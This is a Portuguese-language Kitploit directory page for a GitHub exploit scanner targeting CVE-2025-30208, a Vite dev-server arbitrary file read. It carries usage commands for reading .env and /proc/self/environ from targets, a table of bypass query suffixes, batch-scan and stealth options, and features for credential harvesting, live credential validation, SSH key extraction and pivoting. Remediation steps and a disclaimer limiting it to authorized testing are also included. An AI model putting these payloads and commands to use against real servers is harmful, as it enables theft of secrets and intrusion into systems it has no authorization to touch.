Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30208 — Scanner de exploração para CVE-2025-30208 (leitura arbitrária de arquivos do Vite) com detecção de bypass multivariante, coleta de credenciais, extração de chaves SSH e relatórios estruturados para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/hazavvip/cve-2025-30208
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesTestes de Penetração
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

Scanner de exploração para CVE-2025-30208 (leitura arbitrária de arquivos do Vite) com detecção de bypass multivariante, coleta de credenciais, extração de chaves SSH e relatórios estruturados para testes de penetração autorizados.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-30208 — Leitura Arbitrária de Arquivos no Vite · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
Severidade: CVSS 5.3 Médio (servidor de desenvolvimento acessível pela rede)

⚠ Apenas para engajamentos de segurança autorizados.
O uso não autorizado contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar é ilegal.


Descrição

O servidor de desenvolvimento do Vite permite servir arquivos arbitrários do sistema de arquivos do host através de solicitações /@fs/.
Uma verificação de sanitização de query-string ausente em versões afetadas permite que um atacante anexe sufixos especialmente criados para contornar a lista de permissões e ler qualquer arquivo que o processo possa acessar — incluindo arquivos .env, chaves privadas SSH, credenciais de nuvem e entradas /proc.


Versões Afetadas


Variantes de Bypass


Instalação

root@kitploit:~
pip install requests
# ou
pip install -r requirements.txt

Uso

Alvo único — varredura completa

root@kitploit:~
python main.py -t https://target.com

Cadeia completa de exploração (validação de credenciais ao vivo, comportamento padrão)

root@kitploit:~
python main.py -t https://target.com --full-chain --output /tmp/report

Ler um arquivo específico

root@kitploit:~
python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

Modo furtivo (atrasos aleatórios) + proxy upstream

root@kitploit:~
python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

Varredura em lote a partir de uma lista de alvos

root@kitploit:~
python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

Saída amigável para pipes (sem códigos ANSI)

root@kitploit:~
python main.py -t https://target.com --no-color | tee scan.log

Versão

root@kitploit:~
python main.py --version

Executar como pacote

root@kitploit:~
python -m cve30208 -t https://target.com

Referência da CLI

Portas padrão para varredura em lote: 5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


Saída

Quando --output /tmp/report é especificado, o scanner escreve:

  • /tmp/report.json — resultados estruturados legíveis por máquina
  • /tmp/report.md — relatório Markdown legível por humanos

A varredura em lote sempre imprime VULN_COUNT=N na última linha para fácil script em shell:

root@kitploit:~
python main.py -l targets.txt | grep '^VULN_COUNT='

Varreduras de alvo único imprimem SCAN_STATUS=VULNERABLE|NOT_VULNERABLE no final para automação.


Arquitetura (v5)

root@kitploit:~
cve30208/
├── __init__.py      — superfície da API pública
├── __main__.py      — ponto de entrada python -m cve30208
├── constants.py     — constantes BYPASS, CVE_SIBLING, SECRET_PATTERNS, SSH/scan
├── ui.py            — códigos de cor ANSI, Spin/NullSpin, auxiliares de terminal
├── utils.py         — helpers compartilhados (_unescape_js_string)
├── secrets.py       — scan_secrets(), parse_env(), parse_environ()
├── ssh.py           — extract_ssh_key(), collect_ssh_targets()
├── exploit.py       — ExploitResult, ExploitStage (validação de credenciais ao vivo)
                      inclui um registro de verificação para extensão mais fácil
├── report.py        — save_report(), make_md()
└── scanner.py       — dataclasses FR/R, Scanner, bulk_scan(), main()
main.py              — shim de compatibilidade reversa
requirements.txt

Deduplicação

O scanner suprime automaticamente artefatos repetidos para que a saída permaneça limpa mesmo quando HOME é igual a /root ou o mesmo segredo aparece em múltiplos arquivos:

A linha de resumo informa quantos arquivos, segredos e chaves SSH foram suprimidos como duplicatas, por exemplo:

root@kitploit:~
  desduplicado 2 arquivo(s), 4 credencial(is), 1 chave(s) SSH suprimidas como duplicatas

Remediação

  1. Atualize o Vite para a versão corrigida do seu ramo (veja a tabela acima).
  2. Nunca inicie o servidor de desenvolvimento do Vite com --host 0.0.0.0 em redes não confiáveis.
  3. Rotacione todos os segredos que foram potencialmente expostos (chaves de API, senhas de banco de dados, chaves SSH).
  4. Audite os arquivos .env e remova segredos desnecessários do projeto.

Legal

Esta ferramenta é fornecida apenas para testes de penetração autorizados e pesquisa de segurança.
Ao usar esta ferramenta, você concorda que tem autorização explícita por escrito para testar os sistemas alvo.
Os autores não aceitam responsabilidade por qualquer uso indevido ou dano causado por este software.


CVE-2025-30208 PoC v5

Nota do esquema JSON

O JSON gerado agora inclui:

  • schema_version (atual: 1.0.0)
  • status (VULNERABLE ou NOT_VULNERABLE)
  • safe_mode (true quando o modo de ocultação de segredos no terminal estava ativado)
  • report_redacted (true quando pelo menos um segredo existia e foi ocultado nos relatórios persistidos)
  • os valores de segredos persistidos são sempre ocultados nos arquivos de relatório JSON/Markdown
Baixar ferramenta
RamoÚltima vulnerávelCorrigido
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+
NomeSufixo / QueryDescrição
raw???raw???? à direita quebra rawRE
import&raw???import&raw??ES module + raw combinados
raw??raw?? único à direita
url&raw???url&raw??Modo URL combinado
raw&url???raw&url??Ordem de parâmetros invertida
import&?raw?import&?rawPrefixo de import malformado
sec-fetch?raw + cabeçalho Sec-FetchContexto de script do navegador
raw-encoded?raw%3f%3fSeparadores codificados em URL
double-slash?raw??/Bypass com barra dupla (v5)
pct-all%3fraw%3f%3fQuery totalmente codificada em percentual (v5)
raw-hash?raw??#Bypass com âncora de fragmento (v5)
wasm-init?inline=1.wasm?initIrmão do CVE-2025-31125 (wasm init)
FlagPadrãoDescrição
-t/--target—URL do alvo único
-l/--lists—Arquivo contendo um alvo por linha
--stealthdesligadoAdicionar atrasos aleatórios entre requisições
--proxy—Proxy HTTP/HTTPS (http://host:port)
--timeout10Tempo limite por requisição em segundos
--verifydesligadoHabilitar verificação de certificado TLS
--file—Ler um caminho específico no host alvo
--save—Salvar conteúdo de --file em um caminho local
--full-chainligadoExecutar cadeia completa de exploração (validação ao vivo é padrão)
--output—Escrever relatório JSON + Markdown neste caminho base
--workers10Trabalhadores paralelos para varredura em lote
--portsveja abaixoPortas separadas por vírgula para sondar em modo lote
--no-color/--plaindesligadoDesabilitar códigos de cor ANSI
--safe-modedesligadoOcultar valores de segredos na saída do terminal
--show-secretsdesligadoMostrar segredos completos no terminal (sobrescreve --safe-mode)
--version—Imprimir versão e sair
CamadaMecanismo
Leituras do sistema de arquivosstage_fs normaliza a lista base de chaves SSH com dict.fromkeys e remove caminhos duplicados da fila reads antes que qualquer saída seja produzida.
Salvamento de arquivosScanner._save verifica um conjunto _seen_file_paths por varredura; caminhos duplicados retornam o FR já armazenado sem readicionar a r.files.
SegredosScanner._save desduplica r.secrets globalmente por (name, value) em todos os arquivos; a desduplicação dentro do arquivo é tratada separadamente em scan_secrets.
Chaves SSHstage_ssh colapsa chaves com a mesma assinatura PEM (primeiros _PEM_SIG_LEN bytes) que aparecem em múltiplos arquivos fonte.
Comandos de pivôBlocos de pivô são chaveados por (key_source, host, port); combinações idênticas são impressas apenas uma vez.